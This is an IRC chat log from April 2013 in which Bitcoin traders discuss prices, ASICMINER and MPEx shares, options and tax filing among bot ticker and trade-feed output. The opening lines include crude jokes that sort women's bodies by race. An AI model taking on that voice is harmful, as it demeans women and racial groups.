Apr 27 00:15:34 maybe we can peg it to untapped vagina inches? Apr 27 00:16:15 or centimters if you prefer Apr 27 00:16:16 stfu ThickAsThieves with your imperial units Apr 27 00:16:22 ^ Apr 27 00:16:24 :) Apr 27 00:16:31 [BTCTC] [GSDPT] 1 @ 0.00281 BTC [+] Apr 27 00:16:31 Use black vaginas and not asian vaginas Apr 27 00:16:34 they're deeper Apr 27 00:16:47 mp already presciently did the calculations on trilema Apr 27 00:17:05 he'll prolly announce derivatives any moment Apr 27 00:17:09 And MP, you were right, I forgot how much better a proper irc client is than the stupid webchat. Apr 27 00:17:16 you're welcum Apr 27 00:17:19 [17:16] Use black vaginas and not asian vaginas <--- no one likes colored coins tho Apr 27 00:17:25 bwahaha **** BEGIN LOGGING AT Sat Apr 27 00:18:24 2013 Apr 27 00:18:27 pff selfowned Apr 27 00:20:29 i tell my rackspace cloud manager to fix permissions on one folder and i get a wall of text about FACLs :( Apr 27 00:24:49 (14:01) < jurov> hes just trolling << i guess this could be true. Apr 27 00:25:08 people are so clueless about finance though, that you'd think that he'd try to stay more serious about the subject. Apr 27 00:25:25 ;;tcker Apr 27 00:25:25 Error: "tcker" is not a valid command. Apr 27 00:25:28 ;;ticker Apr 27 00:25:31 BTCUSD ticker | Best bid: 136.30001, Best ask: 136.60000, Bid-ask spread: 0.29999, Last trade: 136.60000, 24 hour volume: 168982.74808586, 24 hour low: 121.45164, 24 hour high: 149.87970, 24 hour vwap: 134.31450 Apr 27 00:26:28 ;;bc,stats Apr 27 00:26:31 Current Blocks: 233309 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 546 blocks | Next Difficulty In About: 3 days, 2 hours, 52 minutes, and 48 seconds | Next Difficulty Estimate: 9981977.43545 | Estimated Percent Change: 11.22853 Apr 27 00:26:43 wow 11.22853 Apr 27 00:27:21 ;;nethash Apr 27 00:27:22 76784.2992817 Apr 27 00:27:29 not bad Apr 27 00:29:01 mp, will options be a lil less timid to volatility next session? Apr 27 00:29:28 indeed. Apr 27 00:29:35 cool cool Apr 27 00:29:39 actually pilot new model should be coming online soonish Apr 27 00:31:06 but now btc will be 137 foreva Apr 27 00:31:15 pegged. Apr 27 00:32:15 like "what if 137 is the new 5?" Apr 27 00:33:12 until the next major country to undergo economic collapse... Apr 27 00:33:36 [BTCTC] [ASICMINER-PT] 1 @ 1.1925 BTC [-] Apr 27 00:33:43 who is next on the list, somalia? Apr 27 00:34:43 Spain isnt looking well these days Apr 27 00:34:54 how can somalia further collapse? Apr 27 00:35:03 jurov my somalia. Apr 27 00:35:46 oh at least slovakia can't collapse. cuz slovak banks all collapsed long ago, all we have are foreign subsidiaries Apr 27 00:36:08 no stock market in bratislava, either Apr 27 00:36:08 [HAVELOCK] [VTX] 4 @ 0.4257 = 1.7028 BTC [-] Apr 27 00:36:30 ;;ticker h vtx Apr 27 00:36:31 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Apr 27 00:36:35 !ticker h vtx Apr 27 00:36:36 [HAVELOCK:VTX] 1D: 0.40070002 / 0.4458272 / 0.48249899 (224 shares, 99.86529265 BTC), 7D: 0.36100100 / 0.45177942 / 0.49750000 (1178 shares, 532.19615862 BTC), 30D: 0.18000000 / 0.40389269 / 0.61488800 (6234 shares, 2517.86702390 BTC) Apr 27 00:37:36 vtx is kinda funny Apr 27 00:37:51 trading allover the place Apr 27 00:38:14 and MPBPT closed at 0.098 (nominal value is 0.1) and no bids anymore... quite chilling mkt anticipation Apr 27 00:38:17 slovakia is NOT somalia Apr 27 00:38:30 too late nao! Apr 27 00:38:31 KRS1 stop scamming us. we know. Apr 27 00:38:44 ok.. Apr 27 00:39:24 krs1 is not scammer, just being anal Apr 27 00:40:42 dunno, should i try to place 0.07 bid for mpbpt and cause panic? Apr 27 00:43:08 [HAVELOCK] [VTX] 1 @ 0.4261 BTC [+] Apr 27 00:43:44 (14:32) < jurov> like "what if 137 is the new 5?" << http://www.quickmeme.com/meme/3u499x/ Apr 27 00:43:56 :D Apr 27 00:44:40 mod6 thx had exactly that in mind...throwing it to -otc Apr 27 00:45:21 should have thought about that mpbpt panic yesterday...i'm so slow recently Apr 27 00:46:08 also vat report was due yesterday, fck that... Apr 27 00:46:55 (14:44) < jurov> mod6 thx had exactly that in mind...throwing it to -otc << haha nice. Apr 27 00:47:07 [HAVELOCK] [VTX] 1 @ 0.4599 BTC [+] Apr 27 00:47:09 so, you can expect coinbr to get seized by slovak tax office over vat not due in time :/ Apr 27 00:47:44 no wai? Apr 27 00:47:58 wtf is vat? Apr 27 00:48:07 drama added taxc Apr 27 00:48:22 ^ yea. socialist yurp stuff Apr 27 00:48:22 value added tax Apr 27 00:48:23 oh value added ta Apr 27 00:48:24 *tax Apr 27 00:49:18 bullshit compound tax Apr 27 00:49:23 i'm gonna have llc with external accounting, looking forward to it Apr 27 00:49:30 then, blow & hookers Apr 27 00:49:56 sigh...when am I going to get all my hookers? Apr 27 00:50:17 hopefully soon. Apr 27 00:50:55 jurov: but coinbr will live on, just a different structure 'eh Apr 27 00:51:11 wait coinbr is down? Apr 27 00:51:17 waaaat? Apr 27 00:51:34 no, i'm jking Apr 27 00:51:40 you can't access it? Apr 27 00:52:28 no I misunderstood Apr 27 00:53:09 [HAVELOCK] [VTX] 4 @ 0.4499 = 1.7996 BTC [-] Apr 27 00:55:08 [HAVELOCK] [HIM] 1 @ 1.7051 BTC [-] Apr 27 00:55:34 it's normal to be a bit late with tax declaration, no criminal stuff Apr 27 00:55:52 plus i don't have anything to declare recently anyway Apr 27 00:56:08 [HAVELOCK] [HIM] 3 @ 1.7997 = 5.3991 BTC [+] Apr 27 00:57:24 well good deal. Sail strong Coinbr! Apr 27 00:59:12 i should kick myself every time i'm thinking of such dangerous jokes Apr 27 01:02:09 [HAVELOCK] [VTX] 1 @ 0.4449 BTC [-] Apr 27 01:06:24 As a side note, thank you to everyone who has been politely educating me today. I've been away from btc for awhile, and before I throw myself into coinbr or other trading I'd like to feel rather competent. Apr 27 01:08:39 "Before I throw myself into ... I'd like to feel rather competent." <<< I'm gonna to use this, thx Apr 27 01:08:50 There are currently 168990.8 bitcoins demanded at or over 50.0 USD, worth 14632147.5237 USD in total. | Data vintage: 70.0259 seconds Apr 27 01:08:58 There are currently 69365.632 bitcoins offered at or under 200.0 USD, worth 11722826.2462 USD in total. | Data vintage: 77.9878 seconds Apr 27 01:15:15 I'm guessing thats something not many people do? Apr 27 01:18:52 GirlfawkesyBTC do you plan to trade actively? Apr 27 01:21:17 [BTCTC] [ASICMINER-PT] 1 @ 1.237 BTC [+] Apr 27 01:22:08 [HAVELOCK] [HIM] 1 @ 1.7051 BTC [-] Apr 27 01:24:10 take that as a no. Apr 27 01:26:14 [BTCTC] [ASICMINER-PT] 1 @ 1.237 BTC [+] Apr 27 01:27:49 GBBG is MUCH MORE then the fund. The fund was started exclusively for members to give them something extra before the core GBBG product is released. The core product has been in development for more than 10 years. Apr 27 01:28:14 [BTCTC] [ASICMINER-PT] 10 @ 1.24 = 12.4 BTC [+] Apr 27 01:28:24 [BTCTC] [ASICMINER-PT] 1 @ 1.24699 BTC [+] Apr 27 01:28:25 the what Apr 27 01:28:28 [BTCTC] [ASICMINER-PT] 3 @ 1.247 = 3.741 BTC [+] Apr 27 01:28:38 [BTCTC] [ASICMINER-PT] 1 @ 1.2479 BTC [+] Apr 27 01:28:48 [BTCTC] [ASICMINER-PT] 3 @ 1.248 = 3.744 BTC [+] Apr 27 01:28:53 [BTCTC] [ASICMINER-PT] 1 @ 1.249 BTC [+] Apr 27 01:29:08 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [+] Apr 27 01:29:12 [BTCTC] [ASICMINER-PT] 3 @ 1.25 = 3.75 BTC [+] Apr 27 01:29:17 [BTCTC] [ASICMINER-PT] 10 @ 1.258 = 12.58 BTC [+] Apr 27 01:29:20 [BTCTC] [ASICMINER-PT] 1 @ 1.2879 BTC [+] Apr 27 01:29:29 [BTCTC] [ASICMINER-PT] 5 @ 1.288 = 6.44 BTC [+] Apr 27 01:29:34 [BTCTC] [ASICMINER-PT] 1 @ 1.289 BTC [+] Apr 27 01:29:44 [BTCTC] [ASICMINER-PT] 10 @ 1.29 = 12.9 BTC [+] Apr 27 01:32:43 yes. Apr 27 01:32:46 [BTCTC] [ASICMINER-PT] 7 @ 1.299 = 9.093 BTC [+] Apr 27 01:33:27 [BTCTC] [ASICMINER-PT] 1 @ 1.299 BTC [+] Apr 27 01:34:34 when asicminer said they would put 12-15TH online some month(s) ago, the price rose from .6 to .9, now that they are actually doing it, it goes from .9 to 1.3 Apr 27 01:35:01 cool story huh. Apr 27 01:35:39 i wonder how much a truly pro btc co would fetch Apr 27 01:36:52 at 1.3, isn't it gonna take like a year or something to get that much in divs? Apr 27 01:37:29 shhhh Apr 27 01:37:57 price will keep going up, no worries! Apr 27 01:38:20 in 3mos we'll have people saying "yeah but in USD we're still up!" Apr 27 01:38:38 i'm sorta preparing a bucket of lulz for the first contractual dispute which won't be resolvable for lack of an actual contract. Apr 27 01:39:18 like how some of the shares were unsold? Apr 27 01:39:37 are* Apr 27 01:39:43 i have no idea what'll it be, but... Apr 27 01:39:53 the entire thing has a lot of promise baked in Apr 27 01:47:31 http://money.cnn.com/2013/04/26/technology/security/livingsocial-hack/index.html lol Apr 27 01:48:31 they are very fucked lol Apr 27 01:48:43 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] Apr 27 01:49:05 http://www.businessinsider.com/livingsocial-may-have-taken-debt-2013-2 Apr 27 01:51:00 o wow had no idea Apr 27 01:51:56 $avg Apr 27 01:51:58 jurov: 132.26 Apr 27 02:07:43 mircea_popescu, will you please mention something here when the April MPOE statement is posted on Trilema? Apr 27 02:07:52 i always do. Apr 27 02:09:50 please also mention the vwap used. i always forget to check it at the opex time :/ Apr 27 02:10:15 you'll have to be dilligent :D Apr 27 02:11:52 https://bitcointalk.org/index.php?topic=101902.msg1955352#msg1955352 Apr 27 02:13:02 yeah mircea_popescu Apr 27 02:13:05 yeah yeah. everyone wants mpex to be an information platform Apr 27 02:13:07 3FTE on SD now ! Apr 27 02:13:16 because blogs forums and news sites + email skype and whatever aren't enough Apr 27 02:13:40 i should compete with twitter and facebook, since this is what you do on the internet. Apr 27 02:13:43 it's funny coming froma guy who basically doesn't run a site with any rel backend Apr 27 02:13:53 asking you to run one so he can send messages Apr 27 02:14:30 amirite cuz SD could you know register accounts and run a db and NOT USE the blockchain Apr 27 02:14:55 i think they're planning to have sessions next. Apr 27 02:14:58 Apr 27 02:19:32 i have posted better solution for erik Apr 27 02:19:41 https://bitcointalk.org/index.php?topic=174620.msg1955543#msg1955543 Apr 27 02:19:45 mostly that though Apr 27 02:24:00 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] Apr 27 02:24:39 i'm currently only operating a sub-level sector 8.3 bitcoin meganode. Apr 27 02:24:40 lmao Apr 27 02:25:26 jurov i srsly don'ty understand why that forum thread isn't good. Apr 27 02:25:32 everyone already knows to watch it Apr 27 02:26:19 ? no i was talking about s.dice thread Apr 27 02:27:31 aren't sessions are too late to benefit of blockchain spam. SD proportion of transactions is going down. perhaps sessions to increase site stickyness Apr 27 02:29:47 Max Keiser gone full clown mode when sugggesting to peg bitcoin to dollar Apr 27 02:29:58 he doesnt know how the currency works at all Apr 27 02:30:10 trying furiously to increase stickyness Apr 27 02:30:33 ok good Apr 27 02:45:33 $avg Apr 27 02:45:35 jurov: 131.83 **** BEGIN LOGGING AT Sat Apr 27 02:53:48 2013 Apr 27 03:01:01 $avg Apr 27 03:01:02 jurov: 131.83 Apr 27 03:01:35 [BTCTC] [ASICMINER-PT] 1 @ 1.2689 BTC [+] Apr 27 03:02:09 [HAVELOCK] [VTX] 2 @ 0.478 = 0.956 BTC [+] Apr 27 03:09:07 [BTCTC] [ASICMINER-PT] 2 @ 1.269 = 2.538 BTC [+] Apr 27 03:11:07 [BTCTC] [GSDPT] 1 @ 0.00326 BTC [+] Apr 27 03:12:36 [BTCTC] [GSDPT] 60 @ 0.00327 = 0.1962 BTC [+] Apr 27 03:13:57 [BTCTC] [GSDPT] 50 @ 0.003332 = 0.1666 BTC [+] Apr 27 03:18:21 [BTCTC] [GSDPT] 25 @ 0.003333 = 0.0833 BTC [+] Apr 27 03:29:32 [BTCTC] [ASICMINER-PT] 1 @ 1.281 BTC [+] Apr 27 03:37:52 [BTCTC] [ASICMINER-PT] 1 @ 1.255 BTC [-] Apr 27 03:38:31 [BTCTC] [ASICMINER-PT] 1 @ 1.248 BTC [-] Apr 27 03:38:48 [BTCTC] [ASICMINER-PT] 1 @ 1.2401 BTC [-] Apr 27 03:39:10 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] Apr 27 03:39:34 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [-] Apr 27 03:55:09 [HAVELOCK] [VTX] 1 @ 0.465 BTC [-] Apr 27 03:59:12 $avg Apr 27 03:59:13 jurov: 131.69 Apr 27 03:59:19 http://trilema.com/2013/mpoe-april-2013-statement/ Apr 27 03:59:21 there we go. Apr 27 03:59:29 SlipperySlope ^ Apr 27 04:01:59 *sigh* -36% Apr 27 04:04:00 myeah. Apr 27 04:04:09 [HAVELOCK] [VTX] 3 @ 0.4501 = 1.3503 BTC [-] Apr 27 04:05:59 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:01 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:03 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:05 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:07 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:08 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:10 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:12 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:14 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:16 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:18 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:20 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:22 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:24 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:24 kakobreklaaaaaaaaaaaa Apr 27 04:06:25 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:27 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:28 lol ouch Apr 27 04:06:29 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:29 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:31 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:33 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:35 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:37 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:39 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:41 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:43 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:45 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:46 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:48 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:50 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:52 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:54 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:56 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:06:58 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:00 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:02 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:04 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:06 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:07 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:09 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:11 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:13 kakobrekla if you use word highlight Apr 27 04:07:13 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:14 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:16 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:18 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:20 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:22 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:24 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:25 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:27 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:29 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:31 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:33 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:35 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:37 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:39 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:41 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:43 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:44 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:46 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:48 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:50 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:52 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:54 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:56 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:07:58 [MPEX] [S.MPOE] 12000 @ 0.00070663 = 8.4796 BTC [-] Apr 27 04:08:14 hm wtf Apr 27 04:08:34 dont fiddle with assbot srsly. Apr 27 04:09:25 so how many btc is that ? Apr 27 04:09:34 0 Apr 27 04:09:47 1 order repeated Apr 27 04:09:56 im doing some ass fiddling Apr 27 04:13:52 mircea_popescu: I had some BTC deposited as surety for some old options contracts at $75, but it doesn't seem like I got it back Apr 27 04:14:29 for O.BTCUSD.P750T options (old ones) Apr 27 04:15:15 well ? Apr 27 04:15:21 p750t is way underwater. Apr 27 04:15:34 $avg Apr 27 04:15:36 mircea_popescu: 131.45 Apr 27 04:15:41 ah, yeah Apr 27 04:15:42 nvm Apr 27 04:15:57 duh Apr 27 04:22:37 ;;ident pizzaman1337 Apr 27 04:22:37 Nick 'pizzaman1337', with hostmask 'pizzaman1337!~pizzaman1@unaffiliated/pizzaman1337', is not identified. Apr 27 04:23:59 ;;gpg eauth pizzaman1337 Apr 27 04:23:59 Request successful for user pizzaman1337, hostmask pizzaman1337!~pizzaman1@unaffiliated/pizzaman1337. Get your encrypted OTP from http://bitcoin-otc.com/otps/48BBF68A41783DF8 Apr 27 04:24:51 gpg everify freenode:#bitcoin-otc:7e3f4363cef5553236faced3a80f1cbaefc58c06ccd1cb0fd70516d1 Apr 27 04:24:55 ;;gpg everify freenode:#bitcoin-otc:7e3f4363cef5553236faced3a80f1cbaefc58c06ccd1cb0fd70516d1 Apr 27 04:24:56 You are now authenticated for user pizzaman1337 with key 48BBF68A41783DF8 Apr 27 04:28:42 mpoe bot not online yet? Apr 27 04:29:05 was a second ago Apr 27 04:29:37 it's perhaps more timid now :) Apr 27 04:31:15 lol Apr 27 04:31:35 perhaps connectivity issues to blockcharts Apr 27 04:34:31 [HAVELOCK] [VTX] 4 @ 0.4619 = 1.8476 BTC [+] Apr 27 04:34:47 [BTCTC] [ASICMINER-PT] 1 @ 1.2797 BTC [+] Apr 27 04:38:54 [BTCTC] [ASICMINER-PT] 1 @ 1.2798 BTC [+] Apr 27 04:39:09 ah yeah, looks like the spread for the bot dropped a ton: http://i.imgur.com/P5aQ53K.png Apr 27 04:39:37 "No i'm not related in any way to Bitfloor, although i used the same html/css front-end framework : bootstrap (which is quite popular among bitcoin services these days i figured" Apr 27 04:40:30 nice graph pizzaman1337 Apr 27 04:40:52 thanks, I need to make a public site for these Apr 27 04:41:18 srsly. Apr 27 04:42:08 i find it pretty incredible that nobody moved into the midmarket during these ~2 weeks Apr 27 04:42:58 they had better things to do with bitcoins than having them stuck as cover? Apr 27 04:43:03 [BTCTC] [ASICMINER-PT] 1 @ 1.2797 BTC [-] Apr 27 04:43:07 [BTCTC] [ASICMINER-PT] 4 @ 1.28 = 5.12 BTC [+] Apr 27 04:43:10 [BTCTC] [ASICMINER-PT] 1 @ 1.28 BTC [+] Apr 27 04:43:15 [BTCTC] [ASICMINER-PT] 2 @ 1.287 = 2.574 BTC [+] Apr 27 04:43:19 [BTCTC] [ASICMINER-PT] 2 @ 1.288 = 2.576 BTC [+] Apr 27 04:43:28 [BTCTC] [ASICMINER-PT] 3 @ 1.288 = 3.864 BTC [+] Apr 27 04:45:10 but i got some interest recently, we'll see Apr 27 04:47:38 i guess that's possible, yea Apr 27 04:48:57 ;;ticker Apr 27 04:48:57 BTCUSD ticker | Best bid: 135.45606, Best ask: 136.00000, Bid-ask spread: 0.54394, Last trade: 136.00000, 24 hour volume: 122987.25837791, 24 hour low: 121.45164, 24 hour high: 139.49743, 24 hour vwap: 131.92260 Apr 27 04:49:11 it'd be nice if the market completed my prediction already Apr 27 04:50:04 [BTCTC] [ASICMINER-PT] 1 @ 1.288 BTC [+] Apr 27 04:53:10 [BTCTC] [COGNITIVE] 1 @ 0.198299 BTC [+] Apr 27 04:54:33 bitcoincharts down indeed Apr 27 04:55:20 [BTCTC] [ASICMINER-PT] 1 @ 1.2471 BTC [-] Apr 27 04:55:23 [BTCTC] [ASICMINER-PT] 1 @ 1.247 BTC [-] Apr 27 04:55:34 [BTCTC] [ASICMINER-PT] 1 @ 1.245 BTC [-] Apr 27 05:00:53 [BTCTC] [ASICMINER-PT] 1 @ 1.26 BTC [+] Apr 27 05:03:51 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] Apr 27 05:03:55 [BTCTC] [ASICMINER-PT] 3 @ 1.24 = 3.72 BTC [-] Apr 27 05:08:01 [BTCTC] [ASICMINER-PT] 1 @ 1.28799 BTC [+] Apr 27 05:12:10 [HAVELOCK] [VTX] 1 @ 0.4571 BTC [-] Apr 27 05:12:12 [HAVELOCK] [VTX] 1 @ 0.4571 BTC [-] Apr 27 05:19:08 [BTCTC] [BASIC-MINING] 1 @ 0.40603 BTC [+] Apr 27 05:23:10 [HAVELOCK] [VTX] 1 @ 0.4581 BTC [+] Apr 27 05:31:02 [BTCTC] [ASICMINER-PT] 1 @ 1.2401 BTC [-] Apr 27 05:31:06 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] Apr 27 05:31:14 [BTCTC] [ASICMINER-PT] 1 @ 1.231 BTC [-] Apr 27 05:31:17 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [-] Apr 27 05:31:23 [BTCTC] [ASICMINER-PT] 4 @ 1.22 = 4.88 BTC [-] Apr 27 05:31:28 [BTCTC] [ASICMINER-PT] 1 @ 1.21 BTC [-] Apr 27 05:31:32 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] Apr 27 05:47:54 whats your prediction diablo Apr 27 05:54:30 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [+] Apr 27 05:56:17 mircea_popescu: 94% of MPEx April revenue from reg fees? Apr 27 05:56:32 something like that Apr 27 05:56:34 mircea_popescu: raise it to 1000 BTC, you could be in the black! Apr 27 05:56:39 lol Apr 27 05:57:02 after march a lot of people perked up. Apr 27 05:58:46 mircea_popescu: perhaps your sales fee is too low? Apr 27 06:00:12 that might be shortsighted Apr 27 06:00:33 mircea_popescu: dare i ask? do you give mpex registration discounts to OTC members? Apr 27 06:00:36 no, everyone else's is too high. Apr 27 06:00:50 joecool you mean wot ? Apr 27 06:00:54 yes Apr 27 06:01:44 i do, if you mention someone;'s key that's already registered you each get 5btc Apr 27 06:02:24 regged on both mpex and wot? Apr 27 06:02:29 [MPEX] [S.MPOE] 4364 @ 0.0007011 = 3.0596 BTC [-] Apr 27 06:02:34 [BTCTC] [ASICMINER-PT] 1 @ 1.2779 BTC [+] Apr 27 06:02:43 [BTCTC] [ASICMINER-PT] 2 @ 1.278 = 2.556 BTC [+] Apr 27 06:02:57 [BTCTC] [ASICMINER-PT] 2 @ 1.28 = 2.56 BTC [+] Apr 27 06:03:16 just mpex. Apr 27 06:03:37 oh, then mircea_popescu Apr 27 06:08:18 [MPEX] [S.MPOE] 50 @ 0.0007011 = 0.0351 BTC [-] Apr 27 06:08:58 [BTCTC] [RSM] 1 @ 0.00439 BTC [+] Apr 27 06:09:11 [HAVELOCK] [VTX] 1 @ 0.4669 BTC [+] Apr 27 06:09:51 kako that 13 btc guys, says he is with justin beiber now, or his suit is next to it and they are having a party Apr 27 06:09:55 fucking lol Apr 27 06:10:56 so did you go ? Apr 27 06:11:10 [HAVELOCK] [SDICE] 2 @ 0.29999999 = 0.6 BTC [+] Apr 27 06:11:12 [HAVELOCK] [SDICE] 10 @ 0.3 = 3 BTC [+] Apr 27 06:11:13 [HAVELOCK] [SDICE] 5 @ 0.3 = 1.5 BTC [+] Apr 27 06:11:13 [HAVELOCK] [SDICE] 8 @ 0.315 = 2.52 BTC [+] Apr 27 06:11:25 kakobrekla see my message about about 13 btc guy Apr 27 06:11:30 mp im in thailand lol Apr 27 06:11:44 so no Apr 27 06:11:50 best thread ever Apr 27 06:12:15 that guy is acting like i did something wrong by saying his 13 btc send proves nothing Apr 27 06:12:24 if he even sent it... Apr 27 06:12:58 he's a little nutty. Apr 27 06:13:00 i don't understnad it Apr 27 06:13:02 why 13, seems arbitrary and small Apr 27 06:13:09 13.37 btc Apr 27 06:13:09 yeah just just a tad nutty Apr 27 06:13:12 he was leet Apr 27 06:13:15 who's wallet is it Apr 27 06:13:18 lol Apr 27 06:13:28 it was rpetalias web wallet Apr 27 06:13:44 he sent to a trolls web wallet Apr 27 06:13:59 why does that matter if he can move 13 coins? Apr 27 06:14:02 i think he at least deseves to be called his rightful name Apr 27 06:14:04 suposedly, as there was no block chain transaction Apr 27 06:14:06 is that symbolic Apr 27 06:14:07 reptilia Apr 27 06:14:23 is it elite to link to one's holdings? Apr 27 06:14:26 n Apr 27 06:14:33 he was trying to show he had 24k btc so he could lose 24 Apr 27 06:14:58 i remember that one time that posted that screenshot of his bitcoinica account Apr 27 06:15:00 i just asked him why he did it and if he wanted to get hacked Apr 27 06:15:02 he had no answer Apr 27 06:15:10 snd then i literally watched him get took in -otc Apr 27 06:15:11 [HAVELOCK] [VTX] 1 @ 0.4669 BTC [+] Apr 27 06:15:18 lol Apr 27 06:15:20 and peopled laughed about it Apr 27 06:15:21 i vaguely remember this Apr 27 06:15:25 who was it ? Apr 27 06:15:27 right? Apr 27 06:15:31 i dunno Apr 27 06:15:40 yea guy published his position got wiped in like 20 minutes Apr 27 06:15:42 all butthurt Apr 27 06:15:43 the lesson was not to show your cards Apr 27 06:16:10 [HAVELOCK] [VTX] 10 @ 0.467 = 4.67 BTC [+] Apr 27 06:16:12 